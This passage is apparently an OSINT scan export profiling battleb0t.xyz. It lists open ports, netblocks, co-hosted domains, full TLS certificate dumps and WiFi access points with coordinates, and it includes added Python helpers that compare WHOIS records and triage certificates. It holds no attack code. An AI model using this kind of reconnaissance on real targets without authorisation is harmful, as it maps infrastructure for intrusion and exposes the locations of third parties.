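Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Name: Redacted for Privacy
Name Server: ns-222.awsdns-27.com
Name Server: ns-854.awsdns-42.net
Name Server: ns-1086.awsdns-07.org
Name Server: ns-2016.awsdns-60.co.uk
DNSSEC: unsigned
"""

if __name__ == "__main__":
    for field, (a, b) in compare(parse_whois(REGISTRY_WHOIS), parse_whois(REGISTRAR_WHOIS)).items():
        print(f"{field}: registry={a!r} registrar={b!r}")
```

Run stand-alone it lists only the Updated Date and abuse-phone differences; an empty result for "name server" or "expiry" is the part worth automating, because those are the fields that move when a domain is transferred or hijacked.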
| 2023-05-12 02:55:25 | Social Media Presence | No | Social Network Identifier | 0 | 0 | 4 | 0 | None | Github: https://github.com/Altpapier/SkyHelperAPI/tree/master/examples | https://github.com/Altpapier/SkyHelperAPI/tree/master/examples |
| 2023-05-12 02:45:44 | Physical Location | No | AbstractAPI | 1 | 0 | 2 | 0 | None | Chantilly, Virginia, 20151, United States, North America | 2606:50c0:8002::153 |
| 2023-05-12 02:54:19 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://fluid.battleb0t.xyz/logo.png | https://fluid.battleb0t.xyz/ |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:76:57:05) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:56:51 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | fluid.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:c7:00:14:21:71:88:e2:18:10:f8:e3:ee:d1:89:37:10:7b
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 27 01:46:47 2022 GMT
Not After : Mar 27 01:46:46 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ca:91:c0:24:2c:ac:ca:ae:72:a2:1c:76:2b:73:
ee:03:78:0b:80:eb:3e:1e:2f:33:3d:ee:c9:08:d3:
24:62:ca:69:54:4a:4f:62:ee:85:3e:9e:5e:5f:d1:
1f:ab:8a:39:77:32:f2:c3:16:74:4d:2e:2a:61:7c:
7c:02:16:fd:f8:90:cd:06:b2:e9:f4:43:77:1b:75:
bb:be:c8:56:44:f6:50:11:ac:06:ec:e8:59:ef:64:
25:2f:4d:3f:96:fc:de:28:67:0a:4e:3f:7e:0e:35:
82:50:a2:e2:53:60:28:9a:07:c8:48:6d:b6:14:30:
5d:26:53:a7:34:c5:04:39:e7:67:e1:8b:e5:5d:a5:
3a:24:32:e3:b6:35:44:1a:60:82:6c:43:b7:4d:91:
70:e8:77:c6:32:fc:99:9f:ad:b8:12:75:4d:70:f3:
52:73:ab:3d:62:1e:0f:a1:00:40:14:f2:ee:4f:92:
e4:8c:8a:19:22:54:b9:c3:71:e1:6b:29:43:5b:56:
a9:e7:cc:16:78:2e:25:bc:fa:16:51:9d:87:b3:64:
aa:85:a8:c4:c7:1b:38:de:e1:9c:ae:93:7d:3f:98:
02:a9:aa:fa:8c:80:52:99:2e:98:ff:77:3d:76:8b:
8f:32:cd:03:00:51:9a:81:df:0d:68:7a:8d:16:fa:
b6:b1
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
6C:34:7D:03:48:53:73:CF:0D:0C:39:44:A5:D1:A0:E8:F3:90:7F:11
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Dec 27 02:46:47.420 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:5E:6B:E1:80:95:E9:06:B9:64:A1:6D:DC:
F7:46:19:D7:44:B3:41:56:D0:CD:B2:17:79:5E:38:01:
98:82:42:B4:02:21:00:BB:82:4F:AE:81:BB:9F:FF:F6:
F5:EC:BC:04:24:9F:54:06:50:1B:72:28:CB:B2:D2:B9:
F3:82:3C:FB:08:50:07
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Dec 27 02:46:47.434 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:DB:34:C7:60:1E:A0:7B:B4:93:B7:C3:
6F:79:DF:2B:2D:A1:07:F6:E0:3C:66:9E:DB:AB:71:DF:
C8:12:FA:43:40:02:20:40:0C:EE:4D:C0:C7:6C:61:B4:
C4:4E:15:E2:3B:37:04:6C:A3:AE:DB:A8:2D:9F:6D:D1:
44:F8:EF:BB:53:2D:AA
Signature Algorithm: sha256WithRSAEncryption
2d:0d:59:11:7e:bd:11:7c:f4:13:c8:d6:c5:40:47:7f:c1:17:
f8:18:85:ad:f5:ee:eb:ca:33:40:d0:80:8a:a2:5e:d9:cb:36:
84:5e:8f:ea:da:80:c0:0f:bc:fb:ed:5d:aa:90:c6:8d:e2:e0:
93:88:ba:dd:b6:40:89:0d:e9:1c:2b:f7:10:55:11:ed:5f:b4:
fb:fb:56:28:a1:cf:a8:59:b5:c5:78:e9:54:8e:06:d9:23:af:
f2:43:7d:64:52:f1:26:ea:4f:5e:ca:47:af:10:86:bc:07:b5:
f9:72:9d:08:e5:af:f4:89:55:6c:58:05:70:62:87:bc:37:3c:
b1:7c:29:a6:06:1e:b5:a4:e0:40:13:6d:69:d7:73:91:80:75:
18:3c:5b:0a:7c:a4:ff:05:c7:98:e1:97:78:96:31:ea:08:08:
4a:40:e6:a1:dd:b4:58:50:6f:80:e3:70:72:18:89:1b:9e:32:
1a:ca:dd:a2:a8:e9:74:eb:2c:c4:a6:1c:b7:31:48:b6:e4:67:
9b:a7:9c:a6:df:cd:82:95:8c:31:83:cd:c7:0e:e3:d2:a3:19:
06:a0:13:7b:a7:11:2c:dd:85:53:7f:ff:2c:0f:11:cf:5d:a7:
fb:7d:2f:9b:4b:7a:3e:55:04:0b:72:4a:13:4f:26:99:3b:63:
24:f8:e3:2a
|
| 2023-05-12 03:32:08 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.5:8443 | 188.114.97.0/24 |
| 2023-05-12 03:08:59 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 87.248.157.92 | 87.248.157.102 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Samsung Galaxy S8_5419 (Net ID: A2:C9:A0:CE:8F:DC) | 37.751, -97.822 |
| 2023-05-12 02:54:19 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://fluid.battleb0t.xyz/app_badge.png | https://fluid.battleb0t.xyz/ |
| 2023-05-12 02:46:29 | Netblock Membership | No | RIPE | 5 | 0 | 3 | 0 | None | 64.226.80.0/20 | 64.226.81.43 |
| 2023-05-12 03:00:36 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.35): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:59:16 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | {u'count': 1, u'search_terms': [{u'id': u'host', u'value': u'188.114.96.1'}], u'result': [{u'environment_id': 100, u'job_id': u'631a665717ba8f2f707e8915', u'analysis_start_time': u'2022-09-08 22:02:00', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'5d930bb75d728b31880a4b3fe975a343b4dfd7855f2a943ba94d6c5bb93a8cfa', u'type': None, u'type_short': u'url', u'size': 44}]} | 188.114.96.1 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | 3035 3464 (Net ID: 00:0F:CC:61:D8:F8) | 32.8608, -79.9746 |
| 2023-05-12 02:46:49 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | netlify.app | 104.196.30.220 |
| 2023-05-12 02:46:50 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | netlify.app | 34.74.170.74 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Eijsbouts (Net ID: 00:01:E3:04:C3:19) | 52.3759, 4.8975 |
| 2023-05-12 02:44:42 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | funny.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:04:02:53:52:8b:ff:fb:8a:0a:11:44:e7:ab:f5:69:c5:9e
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 14 17:33:43 2023 GMT
Not After : Apr 14 17:33:42 2023 GMT
Subject: CN=funny.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:56:66:b3:c8:a2:23:b1:5a:3f:a8:f8:12:86:96:
e9:2c:15:d7:f2:10:34:11:7a:db:91:0d:f0:b3:57:
f5:24:8b:d6:33:b2:e0:da:47:1e:c3:4b:59:19:6f:
0a:27:ae:26:29:f9:b7:07:60:5c:49:2f:47:35:2a:
5c:c8:f0:96:d7
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
3C:85:65:2A:BA:2A:04:2A:54:22:30:3E:E5:23:B1:1E:15:C3:96:05
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:funny.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Jan 14 18:33:43.335 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:F2:1C:95:AC:AF:08:7C:44:9A:42:32:
2C:2F:8A:04:A1:13:F3:46:FA:9D:26:CA:C9:98:C2:1D:
74:69:E4:86:1B:02:21:00:B6:39:78:67:7F:13:7F:74:
50:2A:AE:F8:F3:CD:06:25:FB:E7:4F:A7:FE:B7:C5:D8:
77:35:DE:26:00:5A:58:41
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Jan 14 18:33:43.326 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:98:54:50:30:B1:AC:EB:16:2E:CF:2C:
E2:5C:6F:49:73:2D:91:13:E2:7A:C0:23:16:9D:9E:E9:
34:9D:A8:4E:A2:02:21:00:E3:DA:6F:CF:C9:A3:6F:47:
24:1E:42:4E:CB:2C:6D:AC:F1:F2:5C:4B:15:0B:90:2E:
FE:19:52:BD:26:73:E2:1D
Signature Algorithm: sha256WithRSAEncryption
2f:9e:31:fd:c7:7d:47:cd:fd:01:35:76:75:af:bd:65:15:84:
23:f2:b5:a5:8c:aa:3b:d4:46:ab:0f:e0:6d:fb:3d:ad:16:bd:
71:fe:51:be:c7:6a:78:ea:91:90:3b:63:30:ca:95:ff:ee:9d:
47:eb:f2:5f:85:42:d9:44:d3:72:73:10:be:c7:a2:44:25:dc:
30:6d:25:07:16:5b:55:37:2d:53:15:d4:54:6f:02:56:82:ca:
95:f2:b0:da:05:fe:09:30:21:c9:bf:23:af:eb:66:9c:3c:46:
c8:ed:d9:23:0c:31:c4:20:44:6b:a8:53:fc:12:a1:6a:08:26:
66:47:c9:ad:7e:d3:29:01:28:72:f6:e7:00:31:5c:a0:b4:5c:
64:09:26:8a:da:16:e9:1a:8b:b1:d1:3c:b2:df:e5:77:f4:c3:
a8:4f:d0:1f:26:99:a7:10:8e:7f:65:a5:5e:cc:0b:70:42:ad:
cf:7c:e0:c3:b5:7f:91:07:d9:1f:ba:ef:57:c4:d1:91:9e:a3:
40:93:8d:12:a1:08:bc:b5:cb:35:70:ad:45:f9:4b:fb:c8:74:
0b:37:9e:08:b9:59:0e:0e:55:98:c2:7b:c5:55:28:93:52:3c:
ca:41:c2:5e:52:c3:32:1b:c4:d5:a9:18:45:1e:58:3a:fc:ed:
c0:69:88:aa
|
| 2023-05-12 03:01:15 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.139): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:01:25 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.244): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:03:18 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | www.ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:7b:a3:67:f4:76:b8:d0:86:bd:aa:81:68:7c:78:c6:53:24
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 18:07:07 2022 GMT
Not After : Mar 13 18:07:06 2023 GMT
Subject: CN=ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:f3:5c:50:fa:14:e0:3f:8b:c6:63:22:13:37:d5:
cb:b8:bd:8b:1e:a5:6b:3e:a7:72:86:59:28:5c:40:
8b:1c:f8:2f:50:4b:f5:ef:0d:c5:e9:de:f9:20:da:
78:1c:0d:66:f9:dc:3f:93:0b:74:ad:7f:b2:a1:7a:
56:57:3c:77:28:5a:1a:58:66:08:52:f6:b9:f7:00:
cb:6d:f6:d8:ce:be:b0:7d:24:54:62:4e:58:7b:85:
b9:a9:b7:ac:6a:8d:99:a5:06:fd:0d:b0:88:77:c4:
1e:ca:a9:28:8a:9d:40:a2:d0:47:0a:5a:ad:c2:3d:
86:b0:bc:4e:c3:7b:51:cd:65:3e:10:7e:3b:3a:f9:
c4:70:b5:67:78:ac:bb:4f:31:b9:51:1b:63:89:e0:
2e:5b:c6:8b:52:39:42:6a:aa:6d:6c:72:68:d0:4f:
7c:c9:6a:0a:9c:f8:75:aa:50:d4:8d:ce:7f:ca:28:
87:8a:b7:bc:e2:04:a3:9b:bd:0d:fe:95:0c:de:fb:
3a:e4:bd:4d:5a:d2:f2:ba:0e:54:6d:82:9a:5c:f9:
ee:f6:a3:1e:93:71:37:5f:83:bf:08:49:75:e7:cf:
fc:13:fc:3c:21:17:a8:95:ac:1a:b0:0b:09:b4:ce:
a6:d7:8e:cb:8b:5e:2f:81:f3:69:1e:af:dd:1c:d1:
d3:27
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
BE:C4:2E:77:A7:91:6D:C0:9E:C0:E1:04:BD:9C:50:CA:0E:A6:9A:78
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:ayhu.xyz, DNS:mail.ayhu.xyz, DNS:www.ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
56:a7:32:cc:63:2f:7b:45:7f:05:18:5f:3e:03:67:82:e5:0e:
14:24:2d:4e:bd:24:f5:fa:90:92:69:17:7b:d1:23:b4:5f:72:
7a:af:32:e2:c8:28:7e:98:41:f2:c7:ab:41:34:02:6f:ca:a4:
77:0e:6b:df:35:1b:69:e8:30:42:43:a2:b1:d9:fd:cb:17:1e:
46:a3:67:c9:5d:ff:94:85:0e:a2:df:d3:83:d0:a3:f2:83:7b:
dd:2e:d5:ae:32:94:05:46:0c:19:ca:ed:27:24:30:de:c1:83:
b3:fa:a9:28:10:06:41:f9:bc:8e:ec:2c:b2:c5:50:1b:53:d4:
5f:dc:93:4c:91:47:36:3e:18:bb:60:2e:2b:c3:a2:8e:d0:41:
bf:b5:f2:c1:3c:9e:23:83:f3:0a:e9:90:b8:ea:07:4c:7d:33:
7f:96:41:8c:3e:17:1d:9e:ed:d7:88:e1:f2:d6:4c:ee:67:b7:
9d:77:dd:54:17:a0:45:80:3c:14:ae:d9:2c:f9:2f:a7:d3:1a:
b6:ff:c0:51:b2:15:42:38:03:d0:4b:ff:c0:3f:6d:02:65:07:
67:bb:0a:98:60:da:ab:a9:72:b1:8d:b2:e0:ad:99:f8:08:b9:
1a:39:e6:69:82:23:94:db:8e:23:77:72:cb:aa:45:70:fd:4e:
10:ce:72:06
|
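The certificate dumps attached to the DNS Resolver rows for fluid.battleb0t.xyz and www.ayhu.xyz above are worth reading against the scan timestamp rather than at face value: both have a Not After date earlier than the 2023-05-12 row time, so neither was valid when the scan ran, and the www.ayhu.xyz one carries a critical "CT Precertificate Poison" extension, meaning it is the precertificate submitted to Certificate Transparency logs rather than the leaf a server would present. The following is an added example (not SpiderFoot or OpenSSL code) that parses openssl -text style dumps into the fields a triage needs and applies those two checks plus a SAN hostname match; the embedded dumps are trimmed copies of the page's own rows, and treating the row timestamps as UTC is an assumption.

```python
"""Parse the openssl-style certificate dumps the scan rows carry and judge each
one against the scan time.  Added example for this page; not SpiderFoot code."""
import re
from dataclasses import dataclass, field
from datetime import datetime, timezone

# The rows in this export are stamped 2023-05-12 around 03:00 (assumed to be UTC).
SCAN_TIME = datetime(2023, 5, 12, 3, 0, 0, tzinfo=timezone.utc)
_OPENSSL_DATE = "%b %d %H:%M:%S %Y GMT"


@dataclass
class CertSummary:
    subject_cn: str
    issuer: str
    not_before: datetime
    not_after: datetime
    key: str
    sans: list = field(default_factory=list)
    precert: bool = False          # CT Precertificate Poison extension present

    def expired_at(self, when):
        return self.not_after < when

    def covers(self, hostname):
        """Match against SANs only (browsers ignore the CN); single-label wildcards allowed."""
        for san in self.sans:
            if san.startswith("*."):
                if hostname.count(".") == san.count(".") and hostname.endswith(san[1:]):
                    return True
            elif san == hostname:
                return True
        return False


def parse_openssl_text(text):
    """Pull the fields a triage needs out of `openssl x509 -text` output."""
    def grab(pattern):
        m = re.search(pattern, text, re.M)
        return m.group(1).strip() if m else ""

    not_before = datetime.strptime(grab(r"^\s*Not Before\s*:\s*(.+)$"), _OPENSSL_DATE)
    not_after = datetime.strptime(grab(r"^\s*Not After\s*:\s*(.+)$"), _OPENSSL_DATE)
    # The SAN list sits on the line after the extension header, comma separated.
    san_line = grab(r"^[ \t]*X509v3 Subject Alternative Name:[ \t]*\n[ \t]*(.+)$")
    sans = [p.strip()[4:] for p in san_line.split(",") if p.strip().startswith("DNS:")]
    alg = grab(r"^\s*Public Key Algorithm:\s*(.+)$")
    bits = grab(r"Public-Key:\s*\((\d+) bit\)")
    return CertSummary(
        subject_cn=grab(r"^\s*Subject:.*?CN\s*=\s*([^,\n]+)"),
        issuer=grab(r"^\s*Issuer:\s*(.+)$"),
        not_before=not_before.replace(tzinfo=timezone.utc),
        not_after=not_after.replace(tzinfo=timezone.utc),
        key=f"{alg} {bits}-bit",
        sans=sans,
        precert="CT Precertificate Poison" in text,
    )


def assess(cert, hostname=None, when=SCAN_TIME):
    """Findings a reviewer would flag for this certificate at the given time."""
    findings = []
    if cert.precert:
        findings.append("precertificate from a CT log, not the leaf the server serves")
    if cert.expired_at(when):
        findings.append(f"expired {(when - cert.not_after).days} days before scan")
    elif cert.not_before > when:
        findings.append("not yet valid at scan time")
    if hostname and not cert.covers(hostname):
        findings.append(f"SAN list does not cover {hostname}")
    return findings


# Trimmed copies of two dumps from the rows above (constructed sample input).
FLUID_CERT = """Certificate:
    Data:
        Version: 3 (0x2)
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=US, O=Let's Encrypt, CN=R3
        Validity
            Not Before: Dec 27 01:46:47 2022 GMT
            Not After : Mar 27 01:46:46 2023 GMT
        Subject: CN=fluid.battleb0t.xyz
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                RSA Public-Key: (2048 bit)
        X509v3 extensions:
            X509v3 Subject Alternative Name:
                DNS:fluid.battleb0t.xyz
"""

AYHU_PRECERT = """Certificate:
    Data:
        Version: 3 (0x2)
        Issuer: C=US, O=Let's Encrypt, CN=R3
        Validity
            Not Before: Dec 13 18:07:07 2022 GMT
            Not After : Mar 13 18:07:06 2023 GMT
        Subject: CN=ayhu.xyz
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                RSA Public-Key: (2048 bit)
        X509v3 extensions:
            X509v3 Subject Alternative Name:
                DNS:ayhu.xyz, DNS:mail.ayhu.xyz, DNS:www.ayhu.xyz
            CT Precertificate Poison: critical
                NULL
"""

if __name__ == "__main__":
    for host, blob in (("fluid.battleb0t.xyz", FLUID_CERT), ("www.ayhu.xyz", AYHU_PRECERT)):
        c = parse_openssl_text(blob)
        print(host, c.key, c.not_after.date(), assess(c, hostname=host) or "ok")
```

Run stand-alone it reports the fluid.battleb0t.xyz certificate as 46 days expired and the ayhu.xyz one as a precertificate that was 59 days expired at scan time; a live check of what the host actually serves (openssl s_client with -servername) is still needed before either finding goes into a report, since a CT-logged precertificate says nothing about the current leaf.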
| 2023-05-12 03:01:00 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.103): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:46:16 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Collaborative projects | battleb0t.github.io |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | RTL867x-ADSL (Net ID: 00:08:A1:C5:5A:46) | 40.2024, 29.0398 |
| 2023-05-12 02:54:54 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 2a06:98c1:3121::1:443 | 2a06:98c1:3121::1 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Matrix (Net ID: 00:06:25:B5:6B:A4) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:01:25 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.238): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:32:02 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.2:443 | 188.114.97.0/24 |
| 2023-05-12 02:53:39 | Raw Data from RIRs | No | Censys | 0 | 0 | 2 | 0 | None | {"last_updated_at": "2023-05-12T01:06:26.588Z", "ip": "185.199.108.153", "location_updated_at": "2023-05-11T02:22:47.949696Z", "autonomous_system_updated_at": "2023-04-28T16:49:31.623526Z", "location": {"province": "California", "city": "San Francisco", "country": "United States", "coordinates": {"latitude": 37.7621, "longitude": -122.3971}, "postal_code": "94107", "country_code": "US", "timezone": "America/Los_Angeles", "continent": "North America"}, "dns": {"records": {"turtledev.in": {"record_type": "A", "resolved_at": "2023-03-17T16:23:43.722396430Z"}, "docs.c-labs.com": {"record_type": "CNAME", "resolved_at": "2023-03-17T13:39:25.912117315Z"}, "sidzhang.me": {"record_type": "A", "resolved_at": "2023-05-07T18:33:14.124363141Z"}, "www.gmacd.net": {"record_type": "CNAME", "resolved_at": "2023-04-11T20:22:42.495209956Z"}, "www.umeerrama.com": {"record_type": "CNAME", "resolved_at": "2023-03-16T03:24:25.913053555Z"}, "markthorp.com": {"record_type": "A", "resolved_at": "2023-03-16T13:51:32.870019802Z"}, "lainamae.github.io": {"record_type": "A", "resolved_at": "2023-03-19T16:04:34.954365399Z"}, "rowanmanning.com": {"record_type": "A", "resolved_at": "2023-03-16T14:14:04.579032272Z"}, "www.wise.fitness": {"record_type": "CNAME", "resolved_at": "2023-04-26T17:59:27.361118834Z"}, "yomikang.com": {"record_type": "A", "resolved_at": "2023-03-13T23:26:36.363123885Z"}, "njuics.cn": {"record_type": "CNAME", "resolved_at": "2023-03-22T10:17:45.580207010Z"}, "villterv.duckdns.org": {"record_type": "A", "resolved_at": "2023-03-22T20:33:12.338237784Z"}, "fanschou.github.io": {"record_type": "A", "resolved_at": "2023-03-20T01:52:09.688479139Z"}, "www.mpcontractingllc.com": {"record_type": "CNAME", "resolved_at": "2023-03-18T14:45:02.303045548Z"}, "meth.supplies": {"record_type": "A", "resolved_at": "2023-03-04T19:36:17.924857492Z"}, "sprouttech.co.uk": {"record_type": "A", "resolved_at": 
"2022-11-16T13:56:26.442294692Z"}, "www.jordancox.me": {"record_type": "CNAME", "resolved_at": "2023-02-25T17:36:05.584035257Z"}, "www.raymondyin.com": {"record_type": "CNAME", "resolved_at": "2023-03-20T15:36:01.064188731Z"}, "devxchange.io": {"record_type": "A", "resolved_at": "2023-03-07T16:15:10.934357942Z"}, "www.2briley.com": {"record_type": "CNAME", "resolved_at": "2023-04-28T13:20:47.065260373Z"}, "get.intersolar-nft.com": {"record_type": "CNAME", "resolved_at": "2022-09-29T13:43:22.976827994Z"}, "elvishenry.github.io": {"record_type": "A", "resolved_at": "2023-03-10T15:31:55.603307966Z"}, "www.maloley.me": {"record_type": "CNAME", "resolved_at": "2023-03-08T17:00:37.978750103Z"}, "surdu.me": {"record_type": "A", "resolved_at": "2023-05-04T18:59:57.242525118Z"}, "sarith.net": {"record_type": "A", "resolved_at": "2023-03-22T20:26:16.119209942Z"}, "altiusaero.com": {"record_type": "A", "resolved_at": "2023-04-27T13:40:10.787464508Z"}, "www.felixnrc.ar": {"record_type": "CNAME", "resolved_at": "2023-03-03T12:11:30.075523539Z"}, "www.funmitoblessed.com": {"record_type": "CNAME", "resolved_at": "2023-04-24T14:40:07.732044366Z"}, "api.kekesi.dev": {"record_type": "CNAME", "resolved_at": "2023-03-20T15:57:13.673998398Z"}, "guestsofthetalkshow.net": {"record_type": "A", "resolved_at": "2023-04-24T20:00:08.001925119Z"}, "www.axelfontaine.com": {"record_type": "CNAME", "resolved_at": "2023-04-25T14:00:05.244431324Z"}, "www.bluebridges.ml": {"record_type": "CNAME", "resolved_at": "2023-01-04T15:20:49.107407095Z"}, "www.rowanmanning.com": {"record_type": "CNAME", "resolved_at": "2023-03-22T10:54:15.722717563Z"}, "www.vishvak.com": {"record_type": "CNAME", "resolved_at": "2023-03-23T05:45:50.510079142Z"}, "marcosanson.dev": {"record_type": "CNAME", "resolved_at": "2023-03-02T15:51:31.111859990Z"}, "www.henryelvis.fr": {"record_type": "CNAME", "resolved_at": "2023-03-04T16:13:03.494253182Z"}, "www.phorgr.com": {"record_type": "CNAME", "resolved_at": 
